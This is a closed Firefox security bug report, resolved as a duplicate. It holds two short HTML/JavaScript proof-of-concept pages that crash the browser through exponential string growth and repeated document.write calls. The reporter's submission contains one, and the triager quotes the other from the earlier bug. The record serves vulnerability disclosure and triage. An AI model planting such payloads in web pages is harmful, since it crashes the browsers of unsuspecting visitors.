Closed Bug 576854 Opened 14 years ago Closed 14 years ago

Denial of service

Categories

(Firefox :: Security, defect)

x86
Windows XP
defect
Not set
normal

Tracking

()

RESOLVED DUPLICATE of bug 537620

People

(Reporter: kaboekloe, Unassigned)

Details

User-Agent:       Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Media Center PC 4.0; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Build Identifier: vg

this code make a Denial of service and crach browser:


<body onload="javascript:inifiles();"></body>
 
<script>
 
function inifiles() {
var b = '\x00\x13\xFF\x20\x00\x13\xFF\x24\x00\xE7\x08\x6D';
for (a =0;a<77777777777777;a++) {
b+=b+'\x00\x13\xFF\x20\x00\x13\xFF\x24\x00\xE7\x08\x6D';
document.write('<html><marquee><h1>'+b+b);

}
 
}
 
</script>

Reproducible: Always

Actual Results:  
If somebody place that html code to his website,and victim go to that web with this html code the browser will crach

Expected Results:  
crach

denial of service
Looks essentially the same as bug 537620.

attachment 419887 [details] from bug 537620 is essentially the same as this.

<body onload="javascript:DoS();"></body>

<script>

function DoS() {

var buffer = 'A';
for (i =0;i<150;i++) {
buffer+=buffer+'A';
document.write('<html><marquee>'+buffer+buffer);
}

}

</script>
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 14 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.